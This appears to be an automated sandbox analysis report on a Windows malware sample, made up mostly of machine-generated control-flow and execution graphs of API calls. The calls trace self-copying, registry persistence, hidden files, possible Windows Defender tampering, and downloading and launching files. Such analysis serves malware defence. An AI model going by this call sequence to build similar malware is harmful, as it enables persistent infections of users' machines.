                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 83 a91000-a91022 strlen 84 a9105b-a91060 83->84 85 a91024 83->85 86 a91025-a91033 strlen 85->86 87 a9104b-a91058 strlen 86->87 88 a91035-a91049 strlen 86->88 87->86 89 a9105a 87->89 88->87 88->88 89->84
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1534583432.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1534567960.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1534617530.0000000000A92000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1534631362.0000000000A93000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1534669402.0000000000AA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1534683064.0000000000AA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_a90000_lJ4EzPSKMj.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                                      • String ID: WindowsDefender
                                                                                                                                                                                                      • API String ID: 39653677-3902197025
                                                                                                                                                                                                      • Opcode ID: bb2b2b1a9a9807ec9ea4daa01b02600e6e187b203fdfb425c47d3703ac321cbb
                                                                                                                                                                                                      • Instruction ID: 0736393a2439cddeabf85088d25f161d0204efd9027cd9702fc2f47336d9b46e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb2b2b1a9a9807ec9ea4daa01b02600e6e187b203fdfb425c47d3703ac321cbb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDF0F61BB00667154F11BBB958804EFB7FE5D82274310187AED61DA043E562D59381A0

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:0.9%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:17.6%
                                                                                                                                                                                                      Total number of Nodes:1491
                                                                                                                                                                                                      Total number of Limit Nodes:8
                                                                                                                                                                                                      execution_graph 4456 407940 Sleep CreateMutexA GetLastError 4457 407976 ExitProcess 4456->4457 4458 40797e 6 API calls 4456->4458 4459 407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW 4458->4459 4460 407a23 4458->4460 4461 407dcb RegOpenKeyExW 4459->4461 4462 407d9f RegSetValueExW RegCloseKey 4459->4462 4535 40f1b0 GetLocaleInfoA strcmp 4460->4535 4464 407e24 RegOpenKeyExW 4461->4464 4465 407df8 RegSetValueExW RegCloseKey 4461->4465 4462->4461 4467 407e51 RegSetValueExW RegCloseKey 4464->4467 4468 407e7d RegOpenKeyExW 4464->4468 4465->4464 4467->4468 4473 407ed6 RegOpenKeyExW 4468->4473 4474 407eaa RegSetValueExW RegCloseKey 4468->4474 4469 407a30 ExitProcess 4470 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW 4471 407b36 Sleep wsprintfW CopyFileW 4470->4471 4472 407a8c SetFileAttributesW RegOpenKeyExW 4470->4472 4478 407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4471->4478 4479 407b7e SetFileAttributesW RegOpenKeyExW 4471->4479 4472->4471 4477 407ac8 wcslen RegSetValueExW 4472->4477 4475 407f03 RegSetValueExW RegCloseKey 4473->4475 4476 407f2f RegOpenKeyExW 4473->4476 4474->4473 4475->4476 4481 407f88 RegOpenKeyExW 4476->4481 4482 407f5c RegSetValueExW RegCloseKey 4476->4482 4483 407b29 RegCloseKey 4477->4483 4484 407afd RegCloseKey 4477->4484 4478->4459 4480 407c87 SetFileAttributesW RegOpenKeyExW 4478->4480 4479->4478 4485 407bba wcslen RegSetValueExW 4479->4485 4480->4459 4486 407cc3 wcslen RegSetValueExW 4480->4486 4488 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4481->4488 4489 40801f RegOpenKeyExW 4481->4489 4482->4481 4483->4471 4537 40f400 memset memset CreateProcessW 4484->4537 4490 407c1b RegCloseKey 4485->4490 4491 407bef RegCloseKey 4485->4491 4492 407d24 RegCloseKey 4486->4492 4493 407cf8 RegCloseKey 4486->4493 4488->4489 4495 408050 RegSetValueExW RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4489->4495 4496 4080d9 RegOpenKeyExW 4489->4496 4490->4478 4497 40f400 6 API calls 4491->4497 4492->4459 4498 40f400 6 API calls 4493->4498 4495->4496 4500 4081f0 RegOpenKeyExW 4496->4500 4501 40810a 8 API calls 4496->4501 4502 407c08 4497->4502 4503 407d11 4498->4503 4499 407b21 ExitProcess 4504 408221 8 API calls 4500->4504 4505 408307 Sleep 4500->4505 4501->4500 4502->4490 4506 407c13 ExitProcess 4502->4506 4503->4492 4507 407d1c ExitProcess 4503->4507 4504->4505 4543 40d180 4505->4543 4510 408322 9 API calls 4546 405c00 InitializeCriticalSection CreateFileW 4510->4546 5361 4077f0 4510->5361 5368 4058c0 4510->5368 5377 406f70 Sleep GetModuleFileNameW 4510->5377 4513 40848e 4517 4083d7 CreateEventA 4576 40c8b0 4517->4576 4526 40dbe0 16 API calls 4527 408438 4526->4527 4528 40dbe0 16 API calls 4527->4528 4529 408453 4528->4529 4530 40dbe0 16 API calls 4529->4530 4531 40846f 4530->4531 4619 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4531->4619 4533 408480 4628 40de90 4533->4628 4536 407a28 4535->4536 4536->4469 4536->4470 4538 40f471 ShellExecuteW 4537->4538 4539 40f462 Sleep 4537->4539 4541 40f4a6 4538->4541 4542 40f497 Sleep 4538->4542 4540 407b16 4539->4540 4540->4483 4540->4499 4541->4540 4542->4540 4636 40d150 4543->4636 4547 405d11 4546->4547 4548 405c38 CreateFileMappingW 4546->4548 4558 40e0c0 CoInitializeEx 4547->4558 4548->4547 4549 405c59 MapViewOfFile 4548->4549 4549->4547 4550 405c78 GetFileSize 4549->4550 4554 405c8d 4550->4554 4551 405d07 UnmapViewOfFile 4551->4547 4552 405c9c 4552->4551 4554->4551 4554->4552 4555 405ccc 4554->4555 4765 40d1d0 4554->4765 4772 405d30 4554->4772 4557 40ab60 _invalid_parameter 3 API calls 4555->4557 4557->4552 5076 40e190 socket 4558->5076 4560 4083d2 4571 407390 CoInitializeEx SysAllocString 4560->4571 4561 40e168 5120 40ac80 4561->5120 4564 40e12a 5101 40b430 htons 4564->5101 4565 40e0e0 4565->4560 4565->4561 4565->4564 5086 40e400 4565->5086 4570 40eef0 24 API calls 4570->4561 4572 4073b2 4571->4572 4573 4073c8 CoUninitialize 4571->4573 5265 4073e0 4572->5265 4573->4517 5274 40c870 4576->5274 4579 40c870 3 API calls 4580 40c8ce 4579->4580 4581 40c870 3 API calls 4580->4581 4582 40c8de 4581->4582 4583 40c870 3 API calls 4582->4583 4584 4083ef 4583->4584 4585 40dbb0 4584->4585 4586 40a740 7 API calls 4585->4586 4587 40dbbb 4586->4587 4588 4083f9 4587->4588 4589 40dbc7 InitializeCriticalSection 4587->4589 4590 40bc70 InitializeCriticalSection 4588->4590 4589->4588 4597 40bc8a 4590->4597 4591 40bcb9 CreateFileW 4592 40bce0 CreateFileMappingW 4591->4592 4593 40bd8e 4591->4593 4592->4593 4595 40bd01 MapViewOfFile 4592->4595 5330 40b510 EnterCriticalSection 4593->5330 4595->4593 4598 40bd1c GetFileSize 4595->4598 4597->4591 5281 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4597->5281 5282 40b850 4597->5282 4605 40bd3b 4598->4605 4599 40bda7 4601 40dbe0 16 API calls 4599->4601 4602 408403 4601->4602 4607 40dbe0 4602->4607 4603 40bd84 UnmapViewOfFile 4603->4593 4605->4603 4606 40b850 31 API calls 4605->4606 5329 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4605->5329 4606->4605 4608 40dbf7 EnterCriticalSection 4607->4608 4609 40841c 4607->4609 5357 40dcd0 4608->5357 4609->4526 4612 40dcbb LeaveCriticalSection 4612->4609 4613 40a990 9 API calls 4614 40dc39 4613->4614 4614->4612 4615 40dc4b CreateThread 4614->4615 4615->4612 4616 40dc6e 4615->4616 4617 40dc92 GetCurrentProcess GetCurrentProcess DuplicateHandle 4616->4617 4618 40dcb4 4616->4618 4617->4618 4618->4612 4620 40dd86 InterlockedExchangeAdd 4619->4620 4621 40de69 GetCurrentThread SetThreadPriority 4619->4621 4620->4621 4627 40dda0 4620->4627 4621->4533 4622 40ddb9 EnterCriticalSection 4622->4627 4623 40de27 LeaveCriticalSection 4625 40de3e 4623->4625 4623->4627 4624 40de03 WaitForSingleObject 4624->4627 4625->4621 4626 40de5c Sleep 4626->4627 4627->4621 4627->4622 4627->4623 4627->4624 4627->4625 4627->4626 4629 40df12 4628->4629 4630 40de9c EnterCriticalSection 4628->4630 4629->4513 4631 40deb8 LeaveCriticalSection DeleteCriticalSection 4630->4631 4633 40ab60 _invalid_parameter 3 API calls 4631->4633 4634 40df06 4633->4634 4635 40ab60 _invalid_parameter 3 API calls 4634->4635 4635->4629 4639 40cda0 4636->4639 4640 40cdd3 4639->4640 4641 40cdbe 4639->4641 4643 408317 4640->4643 4671 40cf80 4640->4671 4645 40ce00 4641->4645 4643->4510 4643->4513 4646 40ceb2 4645->4646 4647 40ce29 4645->4647 4650 40a740 7 API calls 4646->4650 4666 40ceaa 4646->4666 4647->4666 4705 40a740 4647->4705 4651 40ced8 4650->4651 4653 402420 7 API calls 4651->4653 4651->4666 4655 40cf05 4653->4655 4657 4024e0 10 API calls 4655->4657 4659 40cf1f 4657->4659 4658 40ce7f 4660 402420 7 API calls 4658->4660 4661 402420 7 API calls 4659->4661 4662 40ce90 4660->4662 4663 40cf30 4661->4663 4664 4024e0 10 API calls 4662->4664 4665 4024e0 10 API calls 4663->4665 4664->4666 4667 40cf4a 4665->4667 4666->4643 4668 402420 7 API calls 4667->4668 4669 40cf5b 4668->4669 4670 4024e0 10 API calls 4669->4670 4670->4666 4672 40cfa9 4671->4672 4673 40d05a 4671->4673 4674 40d052 4672->4674 4675 40a740 7 API calls 4672->4675 4673->4674 4677 40a740 7 API calls 4673->4677 4674->4643 4676 40cfbf 4675->4676 4676->4674 4679 402420 7 API calls 4676->4679 4678 40d07e 4677->4678 4678->4674 4681 402420 7 API calls 4678->4681 4680 40cfe3 4679->4680 4682 40a740 7 API calls 4680->4682 4683 40d0a2 4681->4683 4684 40cff2 4682->4684 4685 40a740 7 API calls 4683->4685 4687 4024e0 10 API calls 4684->4687 4686 40d0b1 4685->4686 4688 4024e0 10 API calls 4686->4688 4689 40d01b 4687->4689 4691 40d0da 4688->4691 4690 40ab60 _invalid_parameter 3 API calls 4689->4690 4692 40d027 4690->4692 4693 40ab60 _invalid_parameter 3 API calls 4691->4693 4694 402420 7 API calls 4692->4694 4695 40d0e6 4693->4695 4696 40d038 4694->4696 4697 402420 7 API calls 4695->4697 4698 4024e0 10 API calls 4696->4698 4699 40d0f7 4697->4699 4698->4674 4700 4024e0 10 API calls 4699->4700 4701 40d111 4700->4701 4702 402420 7 API calls 4701->4702 4703 40d122 4702->4703 4704 4024e0 10 API calls 4703->4704 4704->4674 4716 40a760 4705->4716 4708 402420 4737 40a950 4708->4737 4713 4024e0 4744 402540 4713->4744 4715 4024ff __aligned_recalloc_base 4715->4658 4725 40a800 GetCurrentProcessId 4716->4725 4718 40a76b 4719 40a777 __aligned_recalloc_base 4718->4719 4726 40a820 4718->4726 4721 40a74e 4719->4721 4722 40a792 HeapAlloc 4719->4722 4721->4666 4721->4708 4722->4721 4723 40a7b9 __aligned_recalloc_base 4722->4723 4723->4721 4724 40a7d4 memset 4723->4724 4724->4721 4725->4718 4734 40a800 GetCurrentProcessId 4726->4734 4728 40a829 4729 40a846 HeapCreate 4728->4729 4735 40a890 GetProcessHeaps 4728->4735 4731 40a860 HeapSetInformation GetCurrentProcessId 4729->4731 4732 40a887 4729->4732 4731->4732 4732->4719 4734->4728 4736 40a83c 4735->4736 4736->4729 4736->4732 4738 40a760 __aligned_recalloc_base 7 API calls 4737->4738 4739 40242b 4738->4739 4740 402820 4739->4740 4741 40282a 4740->4741 4742 40a950 __aligned_recalloc_base 7 API calls 4741->4742 4743 402438 4742->4743 4743->4713 4745 40258e 4744->4745 4747 402551 4744->4747 4746 40a950 __aligned_recalloc_base 7 API calls 4745->4746 4745->4747 4750 4025b2 _invalid_parameter 4746->4750 4747->4715 4748 4025e2 memcpy 4749 402606 _invalid_parameter 4748->4749 4751 40ab60 _invalid_parameter 3 API calls 4749->4751 4750->4748 4754 40ab60 4750->4754 4751->4747 4761 40a800 GetCurrentProcessId 4754->4761 4756 40ab6b 4757 4025df 4756->4757 4762 40aaa0 4756->4762 4757->4748 4760 40ab87 HeapFree 4760->4757 4761->4756 4763 40aad0 HeapValidate 4762->4763 4764 40aaf0 4762->4764 4763->4764 4764->4757 4764->4760 4782 40abd0 4765->4782 4767 40d211 4767->4554 4771 40ab60 _invalid_parameter 3 API calls 4771->4767 4995 40a990 4772->4995 4775 405d6a memcpy 4777 40abd0 8 API calls 4775->4777 4776 405e28 4776->4554 4778 405da1 4777->4778 5005 40cb40 4778->5005 4783 40abfd 4782->4783 4784 40a950 __aligned_recalloc_base 7 API calls 4783->4784 4785 40ac12 4783->4785 4786 40ac14 memcpy 4783->4786 4784->4783 4785->4767 4787 40c6e0 4785->4787 4786->4783 4790 40c6ea 4787->4790 4791 40c721 memcmp 4790->4791 4792 40c748 4790->4792 4793 40ab60 _invalid_parameter 3 API calls 4790->4793 4795 40c709 4790->4795 4796 40cbd0 4790->4796 4810 4084a0 4790->4810 4791->4790 4794 40ab60 _invalid_parameter 3 API calls 4792->4794 4793->4790 4794->4795 4795->4767 4795->4771 4797 40cbdf __aligned_recalloc_base 4796->4797 4798 40a950 __aligned_recalloc_base 7 API calls 4797->4798 4809 40cbe9 4797->4809 4799 40cc78 4798->4799 4800 402420 7 API calls 4799->4800 4799->4809 4801 40cc8d 4800->4801 4802 402420 7 API calls 4801->4802 4803 40cc95 4802->4803 4805 40cced __aligned_recalloc_base 4803->4805 4813 40cd40 4803->4813 4818 402470 4805->4818 4808 402470 3 API calls 4808->4809 4809->4790 4926 40a6c0 4810->4926 4814 4024e0 10 API calls 4813->4814 4815 40cd54 4814->4815 4824 4026f0 4815->4824 4817 40cd6c 4817->4803 4820 402484 _invalid_parameter 4818->4820 4821 4024ce 4818->4821 4819 40ab60 _invalid_parameter 3 API calls 4819->4821 4822 40ab60 _invalid_parameter 3 API calls 4820->4822 4823 4024ac 4820->4823 4821->4808 4822->4823 4823->4819 4827 402710 4824->4827 4826 40270a 4826->4817 4828 402724 4827->4828 4829 402540 __aligned_recalloc_base 10 API calls 4828->4829 4830 40276d 4829->4830 4831 402540 __aligned_recalloc_base 10 API calls 4830->4831 4832 40277d 4831->4832 4833 402540 __aligned_recalloc_base 10 API calls 4832->4833 4834 40278d 4833->4834 4835 402540 __aligned_recalloc_base 10 API calls 4834->4835 4836 40279d 4835->4836 4837 4027a6 4836->4837 4838 4027cf 4836->4838 4842 403e20 4837->4842 4859 403df0 4838->4859 4841 4027c7 __aligned_recalloc_base 4841->4826 4843 402820 _invalid_parameter 7 API calls 4842->4843 4844 403e37 4843->4844 4845 402820 _invalid_parameter 7 API calls 4844->4845 4846 403e46 4845->4846 4847 402820 _invalid_parameter 7 API calls 4846->4847 4848 403e55 4847->4848 4849 402820 _invalid_parameter 7 API calls 4848->4849 4850 403e64 _invalid_parameter __aligned_recalloc_base 4849->4850 4853 40400f _invalid_parameter 4850->4853 4862 402850 4850->4862 4852 402850 _invalid_parameter 3 API calls 4852->4853 4853->4852 4854 404035 _invalid_parameter 4853->4854 4855 402850 _invalid_parameter 3 API calls 4854->4855 4856 40405b _invalid_parameter 4854->4856 4855->4854 4857 402850 _invalid_parameter 3 API calls 4856->4857 4858 404081 4856->4858 4857->4856 4858->4841 4866 404090 4859->4866 4861 403e0c 4861->4841 4863 402866 4862->4863 4864 40285b 4862->4864 4863->4850 4865 40ab60 _invalid_parameter 3 API calls 4864->4865 4865->4863 4867 4040a6 _invalid_parameter 4866->4867 4868 4040dd 4867->4868 4870 4040b8 _invalid_parameter 4867->4870 4871 404103 4867->4871 4896 403ca0 4868->4896 4870->4861 4872 40413d 4871->4872 4873 40415e 4871->4873 4906 404680 4872->4906 4874 402820 _invalid_parameter 7 API calls 4873->4874 4876 40416f 4874->4876 4877 402820 _invalid_parameter 7 API calls 4876->4877 4878 40417e 4877->4878 4879 402820 _invalid_parameter 7 API calls 4878->4879 4880 40418d 4879->4880 4881 402820 _invalid_parameter 7 API calls 4880->4881 4882 40419c 4881->4882 4919 403d70 4882->4919 4884 402820 _invalid_parameter 7 API calls 4885 4041ca _invalid_parameter 4884->4885 4885->4884 4888 404284 _invalid_parameter __aligned_recalloc_base 4885->4888 4886 402850 _invalid_parameter 3 API calls 4886->4888 4887 4045a3 _invalid_parameter 4889 402850 _invalid_parameter 3 API calls 4887->4889 4890 4045c9 _invalid_parameter 4887->4890 4888->4886 4888->4887 4889->4887 4891 402850 _invalid_parameter 3 API calls 4890->4891 4892 4045ef _invalid_parameter 4890->4892 4891->4890 4893 402850 _invalid_parameter 3 API calls 4892->4893 4894 404615 _invalid_parameter 4892->4894 4893->4892 4894->4870 4895 402850 _invalid_parameter 3 API calls 4894->4895 4895->4894 4897 403cae 4896->4897 4898 402820 _invalid_parameter 7 API calls 4897->4898 4899 403ccb 4898->4899 4900 402820 _invalid_parameter 7 API calls 4899->4900 4901 403cda _invalid_parameter 4900->4901 4902 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4901->4902 4903 403d3a _invalid_parameter 4901->4903 4902->4901 4904 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4903->4904 4905 403d60 4903->4905 4904->4903 4905->4870 4907 402820 _invalid_parameter 7 API calls 4906->4907 4908 404697 4907->4908 4909 402820 _invalid_parameter 7 API calls 4908->4909 4910 4046a6 4909->4910 4911 402820 _invalid_parameter 7 API calls 4910->4911 4918 4046b5 _invalid_parameter __aligned_recalloc_base 4911->4918 4912 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4912->4918 4913 404841 _invalid_parameter 4914 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4913->4914 4915 404867 _invalid_parameter 4913->4915 4914->4913 4916 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4915->4916 4917 40488d 4915->4917 4916->4915 4917->4870 4918->4912 4918->4913 4920 402820 _invalid_parameter 7 API calls 4919->4920 4921 403d7f _invalid_parameter 4920->4921 4922 403ca0 _invalid_parameter 9 API calls 4921->4922 4923 403db8 _invalid_parameter 4922->4923 4924 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4923->4924 4925 403de3 4923->4925 4924->4923 4925->4885 4927 40a6d2 4926->4927 4930 40a620 4927->4930 4931 40a950 __aligned_recalloc_base 7 API calls 4930->4931 4938 40a630 4931->4938 4934 40ab60 _invalid_parameter 3 API calls 4935 4084bf 4934->4935 4935->4790 4936 40a66c 4936->4934 4938->4935 4938->4936 4939 409b50 4938->4939 4946 40a140 4938->4946 4951 40a510 4938->4951 4940 409b63 4939->4940 4945 409b59 4939->4945 4941 409ba6 memset 4940->4941 4940->4945 4942 409bc7 4941->4942 4941->4945 4943 409bcd memcpy 4942->4943 4942->4945 4959 409920 4943->4959 4945->4938 4947 40a14d 4946->4947 4948 40a157 4946->4948 4947->4938 4948->4947 4949 40a24f memcpy 4948->4949 4964 409e70 4948->4964 4949->4948 4952 40a51c 4951->4952 4954 40a526 4951->4954 4952->4938 4953 409e70 64 API calls 4955 40a5a7 4953->4955 4954->4952 4954->4953 4955->4952 4956 409920 6 API calls 4955->4956 4957 40a5c6 4956->4957 4957->4952 4958 40a5db memcpy 4957->4958 4958->4952 4960 40996e 4959->4960 4962 40992e 4959->4962 4960->4945 4962->4960 4963 409860 6 API calls 4962->4963 4963->4962 4965 409e8a 4964->4965 4967 409e80 4964->4967 4965->4967 4974 409cb0 4965->4974 4967->4948 4969 409fc8 memcpy 4969->4967 4971 409fe7 memcpy 4972 40a111 4971->4972 4973 409e70 62 API calls 4972->4973 4973->4967 4975 409cbd 4974->4975 4976 409cc7 4974->4976 4975->4967 4975->4969 4975->4971 4976->4975 4977 409d50 4976->4977 4979 409d55 4976->4979 4980 409d38 4976->4980 4985 409610 4977->4985 4981 409920 6 API calls 4979->4981 4983 409920 6 API calls 4980->4983 4981->4977 4983->4977 4984 409dfc memset 4984->4975 4986 40961f 4985->4986 4987 409629 4985->4987 4986->4975 4986->4984 4987->4986 4988 4094e0 9 API calls 4987->4988 4989 409722 4988->4989 4990 40a950 __aligned_recalloc_base 7 API calls 4989->4990 4991 409771 4990->4991 4991->4986 4992 409350 46 API calls 4991->4992 4993 40979e 4992->4993 4994 40ab60 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4993->4994 4994->4986 5014 40a800 GetCurrentProcessId 4995->5014 4997 40a99b 4998 40a820 __aligned_recalloc_base 5 API calls 4997->4998 5003 40a9a7 __aligned_recalloc_base 4997->5003 4998->5003 4999 40aaa0 _invalid_parameter HeapValidate 4999->5003 5000 40aa50 HeapAlloc 5000->5003 5001 40aa1a HeapReAlloc 5001->5003 5002 40ab60 _invalid_parameter 3 API calls 5002->5003 5003->4999 5003->5000 5003->5001 5003->5002 5004 405d55 5003->5004 5004->4775 5004->4776 5006 40cb4b 5005->5006 5007 40a950 __aligned_recalloc_base 7 API calls 5006->5007 5008 405ded 5006->5008 5007->5006 5008->4776 5009 4076c0 5008->5009 5010 40a950 __aligned_recalloc_base 7 API calls 5009->5010 5011 4076d0 5010->5011 5012 407717 5011->5012 5013 4076dc memcpy CreateThread 5011->5013 5012->4776 5013->5012 5015 407720 GetTickCount srand rand Sleep 5013->5015 5014->4997 5016 4077ad 5015->5016 5022 407757 5015->5022 5017 4077ab 5016->5017 5018 40f560 58 API calls 5016->5018 5019 40ab60 _invalid_parameter 3 API calls 5017->5019 5018->5017 5021 4077d8 5019->5021 5020 407766 StrChrA 5020->5022 5022->5017 5022->5020 5025 40f560 9 API calls 5022->5025 5026 40f623 InternetOpenUrlW 5025->5026 5027 40f78e InternetCloseHandle Sleep 5025->5027 5028 40f781 InternetCloseHandle 5026->5028 5029 40f652 CreateFileW 5026->5029 5030 40f7b5 6 API calls 5027->5030 5047 407795 Sleep 5027->5047 5028->5027 5031 40f681 InternetReadFile 5029->5031 5051 40f75e 5029->5051 5032 40f831 wsprintfW DeleteFileW Sleep 5030->5032 5030->5047 5033 40f6d4 wsprintfW DeleteFileW Sleep 5031->5033 5034 40f6a5 5031->5034 5035 40f240 18 API calls 5032->5035 5053 40f240 CreateFileW 5033->5053 5034->5033 5036 40f6ae WriteFile 5034->5036 5037 40f871 5035->5037 5036->5031 5039 40f87b Sleep 5037->5039 5040 40f8af DeleteFileW 5037->5040 5042 40f400 6 API calls 5039->5042 5040->5047 5044 40f892 5042->5044 5044->5047 5048 40f8a5 ExitProcess 5044->5048 5045 40f767 DeleteFileW 5045->5051 5046 40f72b Sleep 5049 40f400 6 API calls 5046->5049 5047->5022 5050 40f742 5049->5050 5050->5051 5052 40f756 ExitProcess 5050->5052 5051->5028 5054 40f285 CreateFileMappingW 5053->5054 5055 40f386 5053->5055 5054->5055 5056 40f2a6 MapViewOfFile 5054->5056 5057 40f3a0 CreateFileW 5055->5057 5058 40f3f1 5055->5058 5056->5055 5061 40f2c5 GetFileSize 5056->5061 5059 40f3c2 WriteFile 5057->5059 5060 40f3e8 5057->5060 5058->5045 5058->5046 5059->5060 5062 40ab60 _invalid_parameter 3 API calls 5060->5062 5063 40f2e1 5061->5063 5064 40f37c UnmapViewOfFile 5061->5064 5062->5058 5073 40d1a0 5063->5073 5064->5055 5067 40cb40 7 API calls 5068 40f330 5067->5068 5068->5064 5069 40f34d memcmp 5068->5069 5069->5064 5070 40f369 5069->5070 5071 40ab60 _invalid_parameter 3 API calls 5070->5071 5072 40f372 5071->5072 5072->5064 5074 40cbd0 10 API calls 5073->5074 5075 40d1c4 5074->5075 5075->5064 5075->5067 5077 40e1bd htons inet_addr setsockopt 5076->5077 5082 40e2ee 5076->5082 5078 40b430 8 API calls 5077->5078 5079 40e236 bind lstrlenA sendto ioctlsocket 5078->5079 5085 40e28b 5079->5085 5082->4565 5083 40e2b2 5133 40b4f0 shutdown closesocket 5083->5133 5084 40a990 9 API calls 5084->5085 5085->5083 5085->5084 5124 40e310 5085->5124 5140 40e640 memset InternetCrackUrlA InternetOpenA 5086->5140 5089 40e51e 5089->4565 5091 40ab60 _invalid_parameter 3 API calls 5091->5089 5095 40e4eb 5095->5091 5098 40e4e1 SysFreeString 5098->5095 5247 40b3f0 inet_addr 5101->5247 5104 40b48c connect 5105 40b4a0 getsockname 5104->5105 5106 40b4d4 5104->5106 5105->5106 5250 40b4f0 shutdown closesocket 5106->5250 5108 40b4dd 5109 40eef0 5108->5109 5251 40b3d0 inet_ntoa 5109->5251 5111 40ef06 5112 40d470 11 API calls 5111->5112 5113 40ef25 5112->5113 5118 40e14c 5113->5118 5252 40ef70 memset InternetCrackUrlA InternetOpenA 5113->5252 5116 40ab60 _invalid_parameter 3 API calls 5119 40ef5c 5116->5119 5117 40ab60 _invalid_parameter 3 API calls 5117->5118 5118->4570 5119->5117 5123 40ac84 5120->5123 5121 40ac8a 5121->4560 5122 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5122->5123 5123->5121 5123->5122 5129 40e32c 5124->5129 5125 40e3f4 5125->5085 5126 40e348 recvfrom 5127 40e376 StrCmpNIA 5126->5127 5128 40e369 Sleep 5126->5128 5127->5129 5130 40e395 StrStrIA 5127->5130 5128->5129 5129->5125 5129->5126 5130->5129 5131 40e3b6 StrChrA 5130->5131 5134 40d320 5131->5134 5133->5082 5135 40d32b 5134->5135 5136 40d331 lstrlenA 5135->5136 5137 40a950 __aligned_recalloc_base 7 API calls 5135->5137 5138 40d344 5135->5138 5139 40d360 memcpy 5135->5139 5136->5135 5136->5138 5137->5135 5138->5129 5139->5135 5139->5138 5141 40e6e1 InternetConnectA 5140->5141 5142 40e41a 5140->5142 5143 40e84a InternetCloseHandle 5141->5143 5144 40e71a HttpOpenRequestA 5141->5144 5142->5089 5153 40e530 5142->5153 5143->5142 5145 40e750 HttpSendRequestA 5144->5145 5146 40e83d InternetCloseHandle 5144->5146 5147 40e830 InternetCloseHandle 5145->5147 5149 40e76d 5145->5149 5146->5143 5147->5146 5148 40e78e InternetReadFile 5148->5149 5150 40e7bb 5148->5150 5149->5148 5149->5150 5151 40a990 9 API calls 5149->5151 5150->5147 5152 40e7d6 memcpy 5151->5152 5152->5149 5182 40d250 5153->5182 5156 40e433 5156->5095 5163 40eea0 5156->5163 5157 40e55a SysAllocString 5158 40e571 CoCreateInstance 5157->5158 5159 40e627 5157->5159 5160 40e61d SysFreeString 5158->5160 5162 40e596 5158->5162 5161 40ab60 _invalid_parameter 3 API calls 5159->5161 5160->5159 5161->5156 5162->5160 5199 40e9f0 5163->5199 5166 40e870 5204 40ecc0 5166->5204 5171 40ee20 6 API calls 5172 40e8c7 5171->5172 5178 40e4b2 5172->5178 5221 40eae0 5172->5221 5175 40e8ff 5175->5178 5226 40e990 5175->5226 5176 40eae0 6 API calls 5176->5175 5178->5098 5179 40d470 5178->5179 5242 40d3e0 5179->5242 5186 40d25d 5182->5186 5183 40d263 lstrlenA 5183->5186 5188 40d276 5183->5188 5185 40a950 __aligned_recalloc_base 7 API calls 5185->5186 5186->5183 5186->5185 5186->5188 5189 40ab60 _invalid_parameter 3 API calls 5186->5189 5190 405740 5186->5190 5194 4056f0 5186->5194 5188->5156 5188->5157 5189->5186 5191 405757 MultiByteToWideChar 5190->5191 5192 40574a lstrlenA 5190->5192 5193 40577c 5191->5193 5192->5191 5193->5186 5195 4056fb 5194->5195 5196 405701 lstrlenA 5195->5196 5197 405740 2 API calls 5195->5197 5198 405737 5195->5198 5196->5195 5197->5195 5198->5186 5202 40ea16 5199->5202 5200 40e49d 5200->5095 5200->5166 5201 40ea93 lstrcmpiW 5201->5202 5203 40eaab SysFreeString 5201->5203 5202->5200 5202->5201 5202->5203 5203->5202 5206 40ece6 5204->5206 5205 40e88b 5205->5178 5216 40ee20 5205->5216 5206->5205 5207 40ed73 lstrcmpiW 5206->5207 5208 40edf3 SysFreeString 5207->5208 5209 40ed86 5207->5209 5208->5205 5210 40e990 2 API calls 5209->5210 5212 40ed94 5210->5212 5211 40ede5 5211->5208 5212->5208 5212->5211 5213 40edc3 lstrcmpiW 5212->5213 5214 40edd5 5213->5214 5215 40eddb SysFreeString 5213->5215 5214->5215 5215->5211 5217 40e990 2 API calls 5216->5217 5218 40ee3b 5217->5218 5219 40ecc0 6 API calls 5218->5219 5220 40e8a9 5218->5220 5219->5220 5220->5171 5220->5178 5222 40e990 2 API calls 5221->5222 5223 40eafb 5222->5223 5225 40e8e5 5223->5225 5230 40eb60 5223->5230 5225->5175 5225->5176 5227 40e9b6 5226->5227 5228 40e9cd 5227->5228 5229 40e9f0 2 API calls 5227->5229 5228->5178 5229->5228 5231 40eb86 5230->5231 5232 40ec9d 5231->5232 5233 40ec13 